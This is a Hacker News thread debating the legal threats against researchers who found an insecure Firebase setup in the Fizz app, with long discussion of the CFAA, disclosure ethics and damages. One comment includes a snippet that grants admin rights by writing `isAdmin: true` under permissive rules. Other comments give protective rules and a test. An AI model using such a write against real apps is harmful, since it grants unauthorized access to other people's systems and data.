           | He ended up in prison.
           | 
           | (The conviction was later overturned on a jurisdictional
           | detail, but I think he spent several months in federal
           | prison.)
        
           | xeromal wrote:
           | What's with the _ in your sentences?
        
             | rictic wrote:
             | Ascii convention to emphasize text, similar to doing the
             | same thing with _asterisks_. Markdown later used this
             | syntax for italics and bold, which popularized it further.
        
             | oidar wrote:
             | Not the GP, but that is a common way of bolding words
             | between the underscores in markdown syntax.
        
             | jjtheblunt wrote:
             | i think it's supposed to look like start and stop of
             | underlines.
        
             | wpietri wrote:
             | They represent underlining.
        
             | [deleted]
        
           | dahfizz wrote:
           | IANAL, but the law does not require you to "circumvent"
           | anything[1].
           | 
           | Simply, anyone who "accesses a computer without authorization
           | ... and thereby obtains ... information from any protected
           | computer" is in violation of the CFAA.
           | 
           | If the researchers in question did not download any customer
           | data, nor cause any "damages", I am not sure they are guilty
           | of anything. BUT, if they had, "the victim had insufficient
           | security measures" is not a valid defense. These researchers
           | were not authorized to access this computer, regardless of
           | whether they were technically able to obtain access.
           | 
           | Leaving your door unlocked does not give burglars permission
           | to burgle you.
           | 
           | [1] https://www.law.cornell.edu/uscode/text/18/1030
        
             | bagels wrote:
             | Everyone that is doing security research without
             | permission, and doesn't catch charges, is just luckier (or
             | less annoying) than weev:
             | https://www.wired.com/2013/03/att-hacker-gets-3-years/
        
             | jrockway wrote:
              | That's my understanding of the law. Even the "merge this PR
              | without review using your administrator privileges" move is
              | potentially a crime if company policy doesn't allow you to
              | take that action. Basically, what the code does or intends
              | is not a factor at all; only the (potentially implicit)
              | authorization policy controls.
             | 
             | If I tell you "the password on the postgres account at
             | postgres.jrock.us is blahblah42" and you read the database,
             | it could be argued that you're exceeding your authorized
             | access. The reason people don't tell you their database
             | password on Hacker News is because of countries that don't
             | have that law, I assume.
        
               | nephanth wrote:
               | I will not take out cash in public transport because I
               | don't want to be pickpocketed
               | 
               | Now, does that mean that if I did, you'd have the right
               | to pickpocket me?
        
               | yebyen wrote:
               | > The reason people don't tell you their database
               | password on Hacker News is because of countries that
               | don't have that law, I assume.
               | 
               | That's silly, the reason people protect themselves is so
               | that they are protected. Legal protection is another
               | different kind of protection, but I think it's a deep
               | stretch to argue that one can remove all the technical
               | protections and still keep access to the CFAA and obtain
               | meaningful protection from the law.
               | 
               | > protected computer
               | 
               | If you're suggesting that the CFAA itself protects the
               | computer by definition, then you've excluded the
                | possibility of such a thing as an "unprotected computer",
               | which renders the extra word unnecessary. I don't think
               | that's the intention, that all computers gain the
               | implicit protection, I think there actually needs to be a
               | policy or standard enforced, or ownership made clear.
               | 
               | In the tradition of US property law, I think you need to
               | do the bare minimum of posting "NO TRESPASSING" signs at
               | the border so anyone that walks by them can be said to
               | have observed the difference between your space and the
               | public spaces surrounding it (which they are permitted to
               | be in, just like your private property so long as it's
               | unprotected and they haven't been asked to leave
               | before...)
        
               | jrockway wrote:
               | > That's silly
               | 
               | Yeah, of course ;)
               | 
               | > In the tradition of US property law, I think you need
               | to do the bare minimum of posting "NO TRESPASSING" signs
               | at the border
               | 
               | I guess the law went for an allowlist instead of a
               | denylist this time. Plus one point on their security
               | audit!
               | 
               | > protected computer
               | 
               | As an aside, sometimes I wonder why people make threats
               | like "you must not link to this site without permission".
               | It's like saying "you must not look at my house as you
               | walk by it". You can ask, but it's Not A Thing. I worry
               | that the language could potentially confuse a court
               | someday. (Or that it already did.)
        
               | dahfizz wrote:
                | The term "protected computer" is defined in the CFAA
                | itself[1].
                | 
                | Basically it's any computer used by a bank or the federal
                | government, or used in interstate commerce.
                | 
                | This is just a quirk of the US system of government. If
                | it doesn't fit those criteria, it's going to be up to the
                | state to prosecute based on the state's own version of
                | the CFAA.
               | 
                | [1] https://www.law.cornell.edu/definitions/uscode.php?width=840...
        
               | tptacek wrote:
               | In practice, "protected computer" means "any computer".
        
             | utexaspunk wrote:
              | What about just trying the doorknob to see if it's locked?
             | Is that illegal?
        
             | lcnPylGDnU4H9OF wrote:
             | I wonder if they're conflating CFAA with DMCA 1201[0].
             | They're similar in subject, even if they are actually about
             | different things.
             | 
             | [0] https://www.law.cornell.edu/uscode/text/17/1201
        
             | alasdair_ wrote:
             | This is such a horrible standard. Imagine I put up a web
             | server and only intend myself to access it. I put no
             | security on the pages. Is Google guilty of a CFAA violation
             | for visiting the site?
        
               | dahfizz wrote:
               | The law is not a computer program. It sometimes relies on
               | the ambiguity of human language, and uses human judges &
               | juries to make reasonable decisions within that
               | ambiguity.
               | 
               | I think, in your scenario, you would have a hard time
               | convincing a jury that Google's access to your computer
               | is unauthorized.
        
               | negidius wrote:
               | The same argument could be made about the security
               | research in the article. I think the majority of
                | potential jurors would never find someone guilty or liable
               | for this, but there is always the risk that you are
               | unlucky and end up with 12 who would.
        
             | yebyen wrote:
             | It is true that leaving your door unlocked does not give
             | burglars permission to burgle you, but how is an open door
             | different than a closed door?
             | 
             | Legally, I think it's also true that an open door looks
             | more like an invitation to enter (and it's different from
             | burglary to simply poke your head in the door, see if
              | anything is wrong, and not break or take anything).
             | 
             | If an API is served on a public network and your client
             | hits that API with a valid request which returns 200 (not
             | 401) and that API is shaped like an open door, such that no
             | "knock" or similar magic or special protection-breaking
             | incantations were required in order to obtain "the access"
             | ...
             | 
             | Then would you concede it's not actually like a burglary,
             | but a bit more like going in through an open door to see if
             | everyone is OK? (It sounds like that's more precisely what
             | happened here, I'll admit I haven't read it all...)
        
               | tptacek wrote:
               | This isn't complicated. You can be convicted of breaking
               | & entering through an open door. At trial, your defense
               | will have to convince a jury that a reasonable person
               | would believe they were entitled to go through the door.
               | If the door was to, say, a Starbucks, that defense will
               | be compelling indeed. If it is to a private home owned by
               | strangers, you'll be convicted.
               | 
               | I think that's roughly how it will play out in a CFAA
               | case too: the case will turn on why it was you thought
               | you were authorized to tinker with the things you
               | tinkered with. If, as is so often encouraged on HN, your
               | defense turns on the meanings of HTTP response codes,
               | you'll likely be convicted. On the other hand, if you can
               | tell a convincing story about how anybody who understands
               | a little about how a browser works would think that they
               | were just taking a shortcut to something the site owner
               | wanted them to do anyways, you're much more likely to be
               | OK.
               | 
               | If you create an admin account in the database, it won't
               | much matter what position the door was in, so to speak.
               | 
               | The concept we're dancing around here is mens rea.
               | 
               | (Again: DOJ has issued a policy statement saying they're
               | not going after cases like this Fizz thing, so this is
               | all moot anyways.)
        
               | runnerup wrote:
               | > You can be convicted of breaking & entering through an
               | open door.
               | 
               | This definitely must vary by state. At least in Michigan
               | that would just be trespassing. I know, because I had
               | some very in-depth conversations with my lawyer about
               | whether I had committed trespassing or B&E while
               | exploring steam tunnels underneath a university. In my
               | case, B&E couldn't apply because the door was unlocked. I
               | also committed no other crimes besides simple
               | trespassing.
        
               | tptacek wrote:
               | You're totally right. The more accurate thing to say is
               | "you could be convicted of residential burglary by
               | walking through an open door if the prosecution could
               | convince a jury you did so with the intent to commit a
               | further crime".
        
               | runnerup wrote:
               | That sounds right. I also appreciate how much you
               | regularly add to discussion about the CFAA. I personally
               | think it's a horrible law, but for the most part my
               | understanding of it matches yours. Too many people mix up
               | what "should be" vs. "what is".
               | 
               | In general, I've learned that if you ever wonder whether
               | you might be breaking the CFAA, you are in violation of
               | the CFAA. The only time this logic has ever failed that
               | I've seen was HiQ vs. LinkedIn.
        
               | sokoloff wrote:
               | > You can be convicted of breaking & entering through an
               | open door.
               | 
               | That does not appear to be the case in Massachusetts.
               | Here are the jury instructions relevant to B&E in the
               | nighttime, with the full link below:
               | 
               | To prove the defendant guilty of this offense, the
               | Commonwealth must prove four things beyond a reasonable
               | doubt:
               | 
               | First: That the defendant broke into someone else's
               | (building) (ship) (vessel) (vehicle);
               | 
               | Second: That the defendant entered that (building) (ship)
               | (vessel) (vehicle);
               | 
               | ...
               | 
               | To prove the first element, the Commonwealth must prove
               | beyond a reasonable doubt that the defendant exerted
               | physical force, however slight, and thereby removed an
               | obstruction to gaining entry into someone else's
               | (building) (ship) (vessel) (vehicle). Breaking includes
               | moving in a significant manner anything that barred the
               | way into the (building) (ship) (vessel) (vehicle).
               | Examples would include such things as (opening a closed
               | door whether locked or unlocked) (opening a closed window
               | whether locked or unlocked) (going in through an open
               | window that is not intended for use as an entrance). _On
               | the other hand, going through an unobstructed entrance
               | such as an open door does not constitute a breaking._
               | 
               | (Italicized emphasis is mine.) Entering through an open
               | door appears to be an entering (the second element of the
               | crime), but not a breaking (the first element). IANAL.
               | 
                | https://www.mass.gov/doc/8100-breaking-and-entering-a-buildi...
        
               | yebyen wrote:
               | I don't think it's that simple. The prosecution will have
               | to prove the intent to commit a crime. If it looks like a
               | service that should require authorization, and the door
                | is swinging wide open, there's a decent argument that
                | the prosecution can't show a reasonable neighbor's
                | intent was anything other than a welfare check, and
                | with no criminal intent there is no crime of burglary.
               | 
               | If my neighbor leaves his door open (in the winter, say),
               | and I have cause to believe that something is wrong based
               | on that, is a jury going to convict me for going in there
               | to check on them? It really sounds like that's what was
               | done here.
               | 
               | I guess creating an admin account while I'm in there is a
               | bit like making a key for myself while I look around.
                | That might be over the line. But without that step, I'm
                | not sure how you could have proved that something was
                | even wrong...
               | 
               | I'll go read the article now.
        
               | tptacek wrote:
               | The crime in this case is accessing software running on
               | someone else's computer without their authorization. The
               | "someone else" in this case vehemently objects to the
               | access at issue. The burden of proof is on the
               | prosecution, but their argument is compelling enough that
               | it's the defendant who'd have to do the explaining.
               | 
                | No: you will not get convicted for checking on your
                | neighbor. Everybody involved in that fact pattern will
                | believe that you, at the time, believed it was OK to
                | peek into their house. Now change the fact pattern
                | slightly: you're not a neighbor at all, but rather some
                | random person walking down the street. A lot less
                | clear, right?
               | 
                | Anyways, that's what these cases are often about: the
               | defendant's state of mind.
               | 
               | Note here that this is a Firebase app, so while it's
               | super obvious to me that issuing an INSERT or UPDATE on a
               | SQL database would cross a line, jiggling the JSON
               | arguments to a Firebase API call to flip a boolean is
               | less problematic, since that's how you test these things.
               | The problem in the SQL case is that as soon as you're
               | speaking SQL, you know you've game-overed the
               | application; you stop there.
        
               | yebyen wrote:
               | > Now change the fact pattern slightly: you're not a
               | neighbor at all, but rather some random person walking
               | 
               | It's times like these I regret that neighbors don't talk
               | to each other anymore. How can we even have functioning
               | internet if we don't have network neighborhood...
        
               | dahfizz wrote:
               | Yes, I think your description is perfectly reasonable.
               | You could make a convincing argument that the researchers
                | just poked their heads in through an open door. The
                | fact that the law requires you to steal data or
                | otherwise cause damages would support this idea.
               | 
               | I just wanted to argue against the idea that an
               | unprotected computer is fair game for hacking. Morally
               | and legally, it is not.
        
             | Guvante wrote:
              | I do think your adding "if they took data" to this is a
              | bit odd, given that the original post makes it very clear
              | their defense relied on not taking data or changing
              | anything.
        
             | [deleted]
        
             | supermatt wrote:
             | > accesses a computer without authorization
             | 
              | They were authorized, as per the permissions that Fizz gave
              | users of the app on Firebase. A group of users noticed that
             | it was overly permissive and reported it to them.
             | 
             | > Leaving your door unlocked does not give burglars
             | permission to burgle you.
             | 
             | This is more like giving your stuff away and then reporting
             | it as theft.
        
               | dahfizz wrote:
               | It's nothing like that. Fizz did not want these people
               | making admin accounts on their server. That's the bottom
               | line. They failed to prevent it (forgot to lock their
               | door), but in no way did they actively "give their stuff
               | away". No judge would see it that way.
        
         | bawolff wrote:
         | > After identifying a vulnerability, the researchers created
         | administrator accounts using the database activity they
         | obtained
         | 
         | Ignoring the legalities of it all, this step crosses a line
         | morally imo.
        
           | epoch_100 wrote:
           | Really what happened is we checked whether we could set
           | `isAdmin` to `true` on our existing accounts, and... we were
           | able to. Adi's more technical writeup has details:
           | https://saligrama.io/blog/post/firebase-insecure-by-default/
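            | 
            | For anyone curious what that check looks like mechanically,
            | here's a minimal sketch using the Firebase v9 web SDK (the
            | `users` collection name is an illustrative guess, not
            | Fizz's actual schema):
            | 
            |     // TypeScript; web app config elided
            |     import { initializeApp } from "firebase/app";
            |     import { getAuth } from "firebase/auth";
            |     import {
            |       getFirestore, doc, updateDoc,
            |     } from "firebase/firestore";
            | 
            |     const app = initializeApp({ /* public web config */ });
            |     const db = getFirestore(app);
            |     const uid = getAuth(app).currentUser!.uid;
            | 
            |     // With permissive security rules, a client can write
            |     // fields the app's UI never exposes, even on its own
            |     // user document:
            |     await updateDoc(doc(db, "users", uid), { isAdmin: true });
            | 
            | If the rules don't restrict which fields a user may write,
            | the call succeeds; with sane rules it throws a permission-
            | denied error.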
        
             | bawolff wrote:
              | With further context that seems much more reasonable than
              | it did at first glance.
        
             | adolph wrote:
             | Did you check with the target before you "checked whether
             | we could set `isAdmin` to `true` on our existing accounts?"
             | 
             | If you did not get consent from a subject, you are not a
             | researcher. If you see a door and check to see if it is
              | unlocked without its owner authorizing you to do so, you
              | are in the ethical territory of burglary even if you
              | didn't burgle.
             | 
             | Helpfully the "technical writeup" post links to "industry
             | best practices" [0] which include:
             | 
             |  _If you are carrying out testing under a bug bounty or
             | similar program, the organisation may have established safe
             | harbor policies, that allow you to legally carry out
             | testing, as long as you stay within the scope and rules of
             | their program. Make sure that you read the scope carefully
             | - stepping outside of the scope and rules may be a criminal
             | offence._
             | 
             | The ethically poor behavior of Fizz doesn't mitigate your
             | own.
             | 
              | 0. https://cheatsheetseries.owasp.org/cheatsheets/Vulnerability...
        
               | bawolff wrote:
               | I disagree with this take. There are certainly lines of
               | what is and is not ethical behaviour (where they are is
               | highly debatable), but the vendor doesn't have a monopoly
               | on deciding that.
        
             | tptacek wrote:
             | Yeah, Firebase makes this much more of a gray area than a
             | SQL database would, where you'd know instantly as soon as
             | you issued an INSERT or an UPDATE that you were doing
              | something unauthorized. The writeup is solid; it seems
              | like you took most of the normal precautions a
              | professional team would. The story has the right ending!
        
         | AnthonyMouse wrote:
         | > this is subtle: you can easily rack up 5-6 figure damage
         | numbers from unauthorized security research, but Fizz was so
          | small and new that I'm assuming nobody even contemplated
         | retaining a forensics firm or truing things up with their
         | insurers, who probably did not exist
         | 
         | This seems like a problem with the existing law, if that's how
         | it works.
         | 
         | It puts the amount of "damages" in the hands of the "victim"
         | who can choose to spend arbitrary amounts of resources (trivial
         | in the scope of a large bureaucracy but large in absolute
         | amount), providing a perverse incentive to waste resources in
         | order to vindictively trigger harsh penalties against an
         | imperfect actor whose true transgression was to embarrass them.
         | 
         | And it improperly assigns the cost of such measures, even to
         | the extent that they're legitimate, to the person who merely
         | brought their attention to the need for them. If you've been
         | operating a publicly available service with a serious
         | vulnerability you still have to go through everything and
         | evaluate the scope of the compromise regardless of whether or
         | not _this_ person did anything inappropriate, in case _someone
         | else_ did. The source of that cost was their own action in
         | operating a vulnerable service -- they should still be
         | incurring it even if they discovered the vulnerability
         | themselves, but not before putting it in production.
         | 
         | The damages attributable to the accused _should_ be limited to
          | the damage they _actually caused_, for example by using access
         | to obtain customer financial information and committing credit
         | card fraud.
        
           | [deleted]
        
           | tptacek wrote:
           | A forensics investigation is usually required by insurers.
           | It's not an arbitrary amount of money, it's just an amount
           | you're not happy with. I understand why you feel that way,
           | but it's not the way the law works.
        
             | woah wrote:
             | > This seems like a problem with the existing law, if
             | that's how it works.
             | 
             | > I understand why you feel that way, but it's not the way
             | the law works.
             | 
             | OP was saying they don't think the law should work that
             | way.
        
               | tptacek wrote:
               | Wait'll they learn about the Eggshell Skull Rule.
        
               | AnthonyMouse wrote:
               | This is more in the neighborhood of contributory
               | negligence.
        
             | AnthonyMouse wrote:
             | Services can negotiate the terms of their insurance
             | contract or even choose whether or not to carry insurance.
             | They agree to these terms and know the implications, and
             | again, if the need for the investigation is legitimate then
             | they should be conducting it regardless of how the
             | vulnerability is uncovered.
             | 
             | > it's not the way the law works.
             | 
             | Which is problematic.
        
       | hermannj314 wrote:
        | I realize everyone is quick to side against Fizz, but I thought
        | ethical hacking required prior permission.
       | 
       | Am I to understand you can attempt to hack any computer to gain
       | unauthorized access without prior approval? That doesn't seem
       | legal at all.
       | 
       | Whether or not there was a vulnerability, was the action taken
       | actually legal under current law? I don't see anything indicating
       | for or against in the article. Just posturing that "ethical
       | hacking" is good and saying you are secure when you aren't is
       | bad. None of that seems relevant to the actual question of what
       | the law says.
        
         | epoch_100 wrote:
         | I am not a lawyer (of course). But I find some solace/comfort
         | in the new Justice Department guidance to not charge good faith
         | security researchers under CFAA.
         | https://www.theverge.com/2022/5/19/23130910/justice-departme...
        
         | tptacek wrote:
         | (a) There's no such thing as "ethical hacking" (that's an
         | Orwellian term designed to imply that testing conducted in ways
         | unfavorable to vendors is "unethical").
         | 
         | (b) You don't require permission to test software running on
         | hardware you control (absent some contract that says
         | otherwise).
         | 
         | (c) But you're right, in this case, the researchers presumably
         | did need permission to conduct this kind of testing lawfully.
        
           | otterley wrote:
           | I disagree with (a). Activities can be deemed ethical or
           | unethical, and those norms are presumably reflected in our
           | laws (as unauthorized hacking is). When they're not
           | constrained by law (as certain publication and
           | experimentation practices aren't), then they are constrained
           | by social convention.
        
             | tptacek wrote:
             | This is one of those cases, like "Zero Trust Networking"
             | where you can't derive the meaning of a term axiomatically
             | from the individual words. There is "responsible" and
             | "irresponsible" disclosure, too, but "responsible
             | disclosure" is also a specific, Orwellian basket of vendor-
             | friendly policies that have little to do with ethics or
             | responsibility.
        
               | otterley wrote:
               | "Responsible" and "irresponsible" are slippier words in
               | the disclosure context. In the civil legal context,
               | "responsibility" implies blameworthiness and liability
               | arising out of a duty of care and a breach of the duty.
               | But in the vulnerability disclosure context, since
               | there's no duty prescribed by law, it has come to mean
               | "social" vs. "antisocial" - getting along vs. being at
               | odds.
        
               | tptacek wrote:
               | My point is that it doesn't matter how slippery the
               | underlying words are, because you're not meant to piece
               | together the meaning of the statement from those words
               | --- or rather, you are, but deceptively, by attributing
               | them to the policy preferences of the people who coined
               | the term.
               | 
               | Logomachy aside: "ethical hacking" was a term invented by
               | huge companies in the 1990s to co-opt security research,
               | which was at the time largely driven by small independent
               | firms. You didn't want to engage just anybody, the logic
               | went, because lots of those people were secretly
               | criminals. No, you wanted an "ethical hacker" (later: a
               | _certified_ ethical hacker), who you could trust not to
               | commit crimes while working for you.
        
           | wedn3sday wrote:
           | (a) all hacking is unethical? (b) the database was running in
           | the cloud, not on any computer they controlled. (c)
           | everyone's an asshole here
        
             | some_furry wrote:
             | > all hacking is unethical?
             | 
             | No, that's not what tptacek said.
             | 
             | "Ethical hacking" is from the same vein as "responsible
             | disclosure". These are weasel words that are used to demean
             | security researchers who don't kiss the vendors' ass.
             | 
             | As a security researcher, my ethical obligation is not to
             | the vendors of the software. It's to the users.
             | 
             | Ethically speaking, I don't care if my research makes the
             | vendor look bad, hurts their sales, makes their PR team
             | sad, etc. I similarly don't care if my research makes the
             | vendor look good.
             | 
             | Are the users better protected by my research? If yes,
             | ethical. If not, unethical.
             | 
             | Terms like "ethical hacking" are used to stilt the
             | conversation in the favor of vendors.
             | 
             | > the database was running in the cloud, not on any
             | computer they controlled.
             | 
             | If it's running in the Cloud, but in your Cloud account,
             | it's morally equivalent to running on Your Machine. I'm not
              | sure how the law will interpret _anything_, but absent a
             | compelling counter-argument, I don't imagine lawyers will
             | argue differently.
             | 
             | > everyone's an asshole here
             | 
             | Yeah.
        
           | waihtis wrote:
           | > (a) There's no such thing as "ethical hacking"
           | 
           | Weird stance. Sure, you may disagree on the limitations of
           | scope of various ethical hacking programs (bug bounties and
           | such) but they consistently highlight some very serious flaws
           | in all kinds of hardware and software.
           | 
           | Going out of scope (hacking a company with no program in
           | place) is always a gamble and you're betting on the leniency
           | of the target. Probably not worth it unless you like to live
           | dangerously.
        
             | kasey_junk wrote:
             | His point is that the way the term is used, to protect
             | vendors, has nothing to do with ethics.
             | 
             | If a researcher found a serious vuln, the ethical thing may
             | very well be to document it publicly without coordination
             | with the vendor, especially if such coordination hurts
             | users.
        
           | sleepybrett wrote:
           | (a) what if a company hires an external red team to hack
           | their shit, would that not be 'ethical hacking'?
        
             | tptacek wrote:
             | No, because there's no such thing as "ethical hacking";
             | that's a marketing term invented by vendors to constrain
             | researchers. You'd call what you're talking about
             | "pentesting" or "red teaming". How you'd know you had a
             | clownish pentest vendor would be if they themselves called
             | it "ethical hacking".
        
               | jstarfish wrote:
               | There is no precedent for consequence-free probing of
               | others' defenses. Unauthorized "testing conducted in ways
               | unfavorable to vendors" is generally considered a crime
               | of trespass, because everybody has the right to exist
               | unmolested. Whether or not they have their shit together,
               | you aren't authorized to test your kids' school's
               | evacuation procedure by randomly showing up with a toy
               | gun and a vest rigged with hotdogs and wires.
               | 
               | The way this goes in the digital space, people expect to
               | break into my "house," see if they can get into my safe,
               | snoop around in my wife's/daughter's nightstands, steal
               | some of their underwear as a CTF exercise, help
               | themselves to my liquor on the way out, then send me an
               | invoice for their time while also demanding the right (or
               | threatening) to publish everything they found on their
               | blog. Unsolicited "security research" is a shakedown
               | desperate to legitimize itself. Unlawful search/"fruit of
               | the poisoned tree" exists to keep the cops from doing
               | this to you, but it's totally acceptable for self-
               | appointed "researchers" to do to anybody else I guess.
               | 
               | "Ethical hacking" is notifying the owner/authorities
               | there's a potential problem at an address, seeing if they
               | want your help in investigating, and working with them in
               | that capacity-- proceeding to investigate _only with
               | explicit direction_. Even if their incompetence or
                | negligence in response affects you personally, that's
               | not a cue to break a window and run your own
               | investigation while collecting leverage you can use to
               | shame them into compliance. That shit is just espionage
               | masquerading as concern trolling.
        
               | tptacek wrote:
               | You're doing the same thing the other commenters are:
               | you're trying to derive from first principles what
               | "ethical hacking" means. That's why this marketing trick
               | is so insidious: everybody does that, and attributes to
               | the term whatever they think the right things are. But
               | the term doesn't mean those right things: it means what
               | the vendors meant, which is: co-opted researchers working
               | in collusion with vendors to give dev teams the maximum
               | conceivable amount of time to apply fixes (years, often)
               | and never revealing the details of any flaws (also: that
               | any security researcher that doesn't put the word
               | "ethical" in their title is endorsing criminal hacking;
               | also: that you should buy all your security services from
               | I.B.M.).
               | 
               | You can say "that's not what I mean by ethical hacking",
               | but that doesn't matter, because that's what the term of
               | art itself does mean.
               | 
               | If you want to live in a little rhetorical bubble where
               | terms of art mean what you think they should mean, that's
               | fine. I think it's worth being aware that, to
               | practitioners, that's not what the terms mean, and that
               | people familiar with the field generally won't care about
               | your idiosyncratic definitions.
        
             | akerl_ wrote:
             | As a point of comparison, we don't talk about "ethical
             | plumbing" as a term. If a company hires a plumber to fix
             | their bathroom, they're just a plumber. If somebody breaks
             | the law to enter a place and mess with the pipes, they're
             | just a trespasser.
             | 
             | But the companies that brand themselves as selling
             | "ethical" penetration testing, and sell certifications for
             | "ethical hacking" would very much like you to lump other
              | companies and other security researchers who operate
             | legally into the same mental bucket as criminals by
             | implicitly painting them as "unethical".
        
       | simonw wrote:
       | I found this story about the same situation (linked from the OP)
        | easier to follow:
        | https://saligrama.io/blog/post/firebase-insecure-by-default/
        
         | epoch_100 wrote:
         | Adi's writeup is great, and goes much more into the technical
          | detail than my transcript. I really recommend everyone check
          | out his post.
        
       | pityJuke wrote:
       | Wait, they are a company called Fizz, that was formerly called
       | Buzz [0]? Talk about on the nose.
       | 
       | [0]: https://stanforddaily.com/2022/11/01/opinion-fizz-
       | previously...
        
         | justincredible wrote:
         | [dead]
        
       | c4mpute wrote:
       | That's why you always do anonymous immediate full disclosure.
       | 
       | Nothing else is ethically viable. Nothing else protects the
       | researcher.
        
       | kjjw wrote:
       | [flagged]
        
       | asynchronous wrote:
        | TL;DR on the actual hack: they forgot to set Firebase security
       | rules, yet again.
       | 
       | How do devs forget this step before raising 4.5 million in seed
       | funding?
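       | 
       | For reference, locking this down is not much code. Here's a
       | sketch (collection and field names assumed, mirroring the
       | writeup) of rules that would have blocked the `isAdmin` write,
       | verified with the @firebase/rules-unit-testing package:
       | 
       |     // TypeScript; requires the Firestore emulator running
       |     import {
       |       initializeTestEnvironment,
       |       assertFails,
       |     } from "@firebase/rules-unit-testing";
       | 
       |     const rules = `
       |       rules_version = '2';
       |       service cloud.firestore {
       |         match /databases/{db}/documents {
       |           match /users/{uid} {
       |             allow read: if request.auth != null;
       |             // users may edit their own doc, but never
       |             // privileged fields like isAdmin
       |             allow update: if request.auth.uid == uid
       |               && !request.resource.data.diff(resource.data)
       |                    .affectedKeys().hasAny(['isAdmin']);
       |           }
       |         }
       |       }`;
       | 
       |     const env = await initializeTestEnvironment({
       |       projectId: "demo-fizz",
       |       firestore: { rules },
       |     });
       |     // A user flipping isAdmin on their own doc must fail:
       |     await assertFails(
       |       env.authenticatedContext("alice").firestore()
       |          .collection("users").doc("alice")
       |          .update({ isAdmin: true }),
       |     );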
        
       | xeromal wrote:
       | Thank the lord for the EFF.
        
       | SoftTalker wrote:
       | A private individual or company cannot file criminal/felony
       | charges. Those are filed by a County Prosecutor, District
       | Attorney, State Attorney, etc after being convinced of probable
       | cause.
       | 
       | They could threaten to report you to the police or such
       | authorities, but they would have to turn over their evidence to
       | them and to you and open all their relevant records to you via
       | discovery.
       | 
       | > Get a lawyer
       | 
       | Yes, if they're seriously threatening legal action they already
       | have one.
        
         | epoch_100 wrote:
         | Yes, threatening to report is what was really happening here.
         | But in their effort to scare us, they elided much of that
         | process. From our perspective it was "watch out, you might face
         | felony charges if you don't agree to silence".
        
           | [deleted]
        
         | aidenn0 wrote:
          | Isn't threatening to report someone to the authorities unless
          | they do something extortion?
        
           | gingerrr wrote:
            | As the linked article notes, it's explicitly against the
            | California State Bar Code of Conduct to threaten criminal
            | proceedings to gain an advantage in a civil dispute, so
            | while not technically illegal it's censurable - and that's
            | against the attorneys who threatened, not the clients they
            | represent.
        
             | aidenn0 wrote:
             | What I'm pondering is how what happened in TFA is different
             | from a situation like:
             | 
             | 1. I (legally) gather evidence of a neighbor committing a
             | criminal action; e.g. take a picture of them selling
             | illicit drugs.
             | 
             | 2. I threaten to send the evidence to the authorities
             | unless they pay me money.
             | 
             | That seems like blackmail to me, which is illegal under
             | both state and federal law. The only difference I can think
             | of is the consideration. If the consideration must be
             | property for it to count as blackmail, then what about this
             | situation:
             | 
             | 1. I'm engaged in a civil dispute with my neighbor
             | 
             | 2. I gather evidence of them committing a criminal action
             | 
             | 3. I threaten to reveal the evidence unless they settle in
             | my favor
             | 
              | Does that magically become legal because no money changes
              | hands?
        
       | Buttons840 wrote:
       | > And then, one day, they sent us a threat. A crazy threat. I
       | remember it vividly. I was just finishing a run when the email
       | came in. And my heart rate went up after I stopped running.
       | That's not what's supposed to happen. They said that we had
       | violated state and federal law. They threatened us with civil and
       | criminal charges. 20 years in prison. They really just threw
       | everything they could at us. And at the end of their threat they
       | had a demand: don't ever talk about your findings publicly.
       | Essentially, if you agree to silence, we won't pursue legal
       | action. We had five days to respond.
       | 
        | This, during a time when thousands or millions of people have
        | their personal data leaked every other week, over and over,
        | because companies don't want to cut into their profits.
       | 
       | Researchers who do the right thing face legal threats of 20 years
       | in prison. Companies who cut corners on security face no
       | consequences. This seems backwards.
       | 
       | Remember when a journalist pressed F12 and saw that a Missouri
       | state website was exposing all the personal data of every teacher
       | in the state (including SSN, etc). He reported the security flaw
       | responsibly and it was embarrassing to the State so the Governor
       | attacked him and legally harassed him.
       | https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
       | 
       | I once saw something similar. A government website exposing the
       | personal data of licensed medical professionals. A REST API
       | responded with _all_ their personal data (including SSN, address,
        | etc), but the HTML frontend wouldn't display it. All the data
       | was just an unauthenticated REST call away, for thousands of
       | people in the state. What did I do? I just closed the tab and
       | never touched the site again. It wasn't worth the personal risk
       | to try to do the right thing so I just ignored it and for all I
       | know all those people had their data stolen multiple times over
       | because of this security flaw. I found the flaw as part of my job
       | at the time, I don't remember the details anymore. It has
       | _probably_ been fixed by now. Our legal system made it a huge
        | personal risk to do the right thing, so I didn't do the right
       | thing.
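       | 
       | (The anti-pattern, for anyone who hasn't seen it: the server
       | serializes the whole record and trusts the frontend to choose
       | what to show. A hypothetical sketch, not the actual site:)
       | 
       |     // TypeScript; endpoint and field names are made up
       |     interface LicenseeRecord {
       |       name: string;
       |       licenseId: string;
       |       ssn: string;          // returned, never shown in the UI
       |       homeAddress: string;  // same
       |     }
       | 
       |     // No authentication required on the API call itself:
       |     const res = await fetch("/api/licensees/12345");
       |     const record: LicenseeRecord = await res.json();
       | 
       |     // Only the frontend decides to display a subset:
       |     console.log(record.name, record.licenseId);
       | 
       | Filtering in the client is not access control; the fix is for
       | the server to never serialize fields the caller isn't entitled
       | to see.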
       | 
       | Which brings me to my point. We need strong protections for those
       | who expose security flaws in good faith. Even if someone is a
       | grey hat and has done questionable things as part of their
       | "research", as long as they report their security findings
       | responsibly, they should be protected.
       | 
       | Why have we prioritized making things nice and convenient for the
       | companies over all else? If every American's data gets stolen in
       | a massive breach, it's so sad, but there's nothing we can do
        | (shrug). If one curious user or security researcher pokes an app
       | and finds a flaw, and they weren't authorized to do so, OMG!,
       | that person needs to go to jail for decades, how dare they press
       | F12!!!1
       | 
       | This is a national security issue. While we continue to see the
       | same stories of massive breaches in the news over and over and
       | over, and some of us get yet another free year of monitoring that
       | credit agencies don't commit libel against us, just remember that
       | we put the convenience of companies above all else. They get to
       | opt-in to having their security tested, and over and over they
       | fail us.
       | 
       | Protect security researchers, and make it legal to test the
       | security of an app even if the owning company does not consent.
       | </rant>
        
         | sleepybrett wrote:
          | We need personal data protection laws in this country so that,
          | as an individual, after a data breach at wherever, I can
         | personally sue them for damages. Potentially very significant
         | damages if they leak a full dossier like a credit reporting
         | agency.
         | 
         | If that happens the whole calculus of bug bounties changes
         | immediately.
        
       | helaoban wrote:
       | Don't you have to ask for permission to be white-hat?
        
         | jerf wrote:
         | I'd suggest reading tptacek's comment:
         | https://news.ycombinator.com/item?id=37298589 which does not
         | 100% address your exact question, but gets close. As
         | disclaimed, tptacek is not a lawyer, but has a lot of
         | experience in this space and I'd still take it as a first pass
         | answer.
         | 
         | Personally, I don't see it as worth it to pursue a company that
